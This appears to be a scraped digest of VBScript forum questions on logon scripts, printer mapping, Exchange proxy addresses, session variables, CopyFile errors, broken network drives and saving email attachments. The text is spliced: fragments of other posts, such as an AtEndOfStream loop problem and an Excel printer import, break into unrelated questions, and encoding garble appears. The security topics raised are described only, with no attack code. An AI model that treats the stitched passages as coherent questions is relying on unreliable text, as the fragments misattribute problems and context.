 - Problem trying to run program from script, waiting for result I have a vbscript that creates a directory, copies a .exe to it and then should run that . exe, waiting for the end of the execution in order to do some other actions, such as copying another file to that directory overwriting one created by the execution. The problem is that when it tries to run the program, it just opens an explorer window in â??c:\â??, gives an vbscript error: â??Unable to wait for processâ??, code:80020009, Source: WshShell.Run, and exits with return code = 0!  - Logon script to connect to printers I am having a slight problem with adding a windows printer connection on users that are not granted local power user permissions to the computer on the domain. My script does function. It uses the AddWindowsPrinterConnection method. It adds the printer and does not kick back any errors while logging in. But, if you right click on the printer, it kicks back a memory address error. The properties page does load, but you can tell the driver has not been installed or completely installed. This has been a problem for newer HP printers that do not have drivers provided by Microsoft. When i manually search for a printer and connect to another printer that has a driver not provided with windows, but was installed by an HP CD, I recieve the same address error, but different address. This problem has been noticed on Windows XP SP2 and the print server is 2003 SP1. The two printers that have had problems are the HP 1320nw and HP 4250n. I also cannot remotely manage these XPSP2 machines from directory services of computers and users. Any workarounds? Is there a way to run this script as an elevated user?  - Exchange Server address creation - timing issue? I am scripting user/mailbox creation. All goes well until trying to add additional SMTP address by manipulating the property, proxyAddresses. Problem does not appear to be in the code, but the fact that after creating the mailbox there is a delay until the base email addresses are created by the Exchange Recipient Policies. That is triggered by the creation of the mailbox, or the assignment of the mailbox properties. The error I get when attempting to access the objUser.proxyAddresses is "the object is not a collection." This is true until the email addresses are actually generated. If I pause the script with a breakpoint, after creating the mailbox, but before attempting to read the proxyAddresses, and then open up ADUC to view the user's properties on the Exchange Email Addresses tab, there is no data in the GUI either. After a pause, varying from several seconds to 2 minutes, the addresses appear. At that point, I can resume the script and it reads the proxyAddresses value with no problem. I assume from this that the script code is OK, even though it doesn't work.  - Replacing or improving Session vars usage - advice Hi, I'm working on a VBScript application on IIS6 and I'm looking for some advice about the best way of replacing or improving session variable usage. The application is in a secure extranet environment. Currently the application has a search customers page with 10 search fields which list the results below the search fields. The requirement for this screen was that the user could return to this result page at any point from any page in the application and see his last set of results. As a quick fix I used session variables to store the search values and loaded them into the search page upon return. Works fine and didn't worry me too much about using 10 session vars. Now the users want similar functionality on all search screens (another 6) giving me a potential of 60 session variables for search results (on top of about another 10 legacy session vars). Suddenly I am worried about 70 session variables, potentially containing reasonably long strings, with a 2 hour session timeout for a potential 1000 users. What would people recommend I do to either replace the session variables or improve performance of them. My thoughts are: 1. Store in the database alongside the user record. I'm already retrieving the user record on most pages so it would be a case of getting the extra 60 fields from the DB when required. Would also provide cross session result persistence. 2. Cookies. Have only ever used sparingly. Would this be too much data for storing in cookies ? Any performance trade-off ? 3. Store an array/arrays in fewer session variables. Each search result page could just have one session variable with an array of all the search field values for that page. Would one session variable containing an array be much better than 10 session variables ? 4. Just use the 70 session variables and stick more memory in the server if we get issues. Probably the cheapest and easiest solution, though not the right one I'm sure. Any advice would be much appreciated as I'm kind of at the limit of what I know about performance issues. The first read, outside the DO loop works, but it never enters the loop to read the remaining 300+ lines. It's as if it thinks it's at EOF already. Can the content of the lines being read effect the behavior of AtEndOfStream? Almost all of the lines in the files end in #@ and almost all of them start with ~.  - scripting question and no output I copied the info below into notepad and saved the file as accounts.vbs to the desktop. It's supposed to list all computer accounts in AD and I copied it directly from scripts at MS.com.  - printer scripting dependent on computer name Jens Frieben from this group gave me some help creating the folowing script to map a printer depending on the computer's name. But I'm not sure I have it quirte right yet because it doesn't work. It seems to go through all the steps because I get the Script Complete message. But no printer is added. (Maybe I have a group policy interfering). It's suppose to check the first eight characters of the computer name (ex 047-lib out of 047-lib-05) and base the printer selection on that.  - CopyFile returns error 800A0034 Hi, I have read through other forums regarding this error. I am receiving it with the destination parameter. I am trying to use a variable I have contructed with the UNC and a users name. I have tried with qoutes & w\o, tried with file name & w\o, with the last backlash & w\o. If I enter the destination are a UNC path in quotes works like a charm, but not when I construct the destination.  - Login script errors on a blank line I am getting an error on a blank line of my script. I'm getting an error line: 138 char: 3 error: Network path was not found code: 80070035 source: WSHNetwork.MapNetworkDrive When I use my status bar in Notepad it takes me to a blank line in the script. I've tried deleting it, commenting it out, commenting it and several lines around it out. And this error doesn't consistently occur on all user at all time. There's no pattern to who it happens to and when it happens. What could be causing this? I've also checked all the network paths and they are all working and valid.  - drive size for drives without drive letters Greetings, I'm using the following script to check drive sizes on various servers.  - Filtering usernames and passwords I'm a newbie at VBScript so I apologize beforehand if this is something that's been asked a dozen times already. I've inherited a login page with a username and a password. The maxlen for the password is 64 and the maxlen for the username is 100 (no problem handling this). However, this is used against a Crystal Reports server that allows letters, numbers and punctuation in these login fields. I need to filter out characters that are not letters, numbers or punctuation before the login is submitted. I work for a govt. agency and a security expert was able to type in some script into one of the fields and run it via VBScript and print a screenshot, so it's a big deal and I've gotta disable it. It reads (Port name, IP address, Driver name, Printer name, Share name, Location, etc. ) from Excell and uses that information to create a bunch of printers on a print server. I created this on my test server (Win 2003 SP1) and it works fine. If I map a driveletter to a network-share, the share can be enumerated using EnumNetworkDrives of WScript.Network - and likewise un-mapped using RemoveNetworkDrive (or re-mapped using MapNetworkDrive). But if the network share is removed before the mapped driveletter is un-mapped, the mapping is broken and appears in Windows Explorer as a driveletter with a red cross - and if you try to access the driveletter you get the errormessage "The network name cannot be found". Now if you use EnumNetworkDrives the broken driveletter mapping doesn't appear as a network drive - and you can't use RemoveNetworkDrive to remove the connection, this results in the error "WSHNetwork.RemoveNetworkDrive: This network connection does not exist". If MapNetworkDrive is attempted on the same driveletter you get the error "WSHNetwork.MapNetworkDrive: An attemp made to remember a device that had previously been remembered". I have one main keyword "Booking" to get all the docs, but then I need to search for "ORDER NO :" and copy the rest of the line, then "DATE :" and copy whats left on that line into a variable. Now the problem is this script does not have exit/end if as it is meant for monitoring due to this startup is waiting for the script to end - which will never happen.  - Need to reed data into a script I have a script that installs a TCP/IP printer port and shared printer. The script works fine. (See Below) However I need to install over 100 different printers to my print server. All the printer speciffic information I need is in an Excell spread sheet, (Port name, IP address, Driver name, Printer name, Share name, Location, etc. ). I want to run this script and have it create all my printer ports and printer shares. I know I will have to change the printer speciffic data in the script to variables, but I am not sure how to have the script read the data form either Excell or a .CSV file.  - Getting domain information in Windows 2000 Hello there. Hope someone can help me out here! I've got a script which uses the WMI service to get information about the domain, using this query.... Select * from Win32_NTDomain where DomainName='MYDOMAIN' From this information, I use the DcSiteName to automatically configure the local machine (long story). Anyway, this works fine - I can grab the domain controller site name under windows XP, but this won't work for Windows 2000. This is true, according to the scripting pages on Microsoft.com.  - Trying to write a program that would collect images received as email attachments Hello, Desperately, I am trying to find a way to write a program that would collect images received as email attachments and save them to a specific folder with a changed filename into whatever was the subject of that email. There would be one image per email. Here is how I think it would work: (1) Receive an image in email attachment. (2) Retrieve the image from that attachment. (3) Change the name of the image file into what was written in the Subject of that email. (4) Save the renamed image file into a specific folder. (4) Delete the received email I have done some research and found that the application would need to interact with MAPI. Could you please tell me if you have seen any similar programs written in VBScript somewhere on the internet, or could you give me some very specific advice or directions. P.S. I would like to be able to run a script that would export an outlook
users set of accounts. Specifically I have users with internet mail
accounts that I want to save before I re-image the machine, and then
return the data into the new outlook instance.

Any Ideas on how to do this?
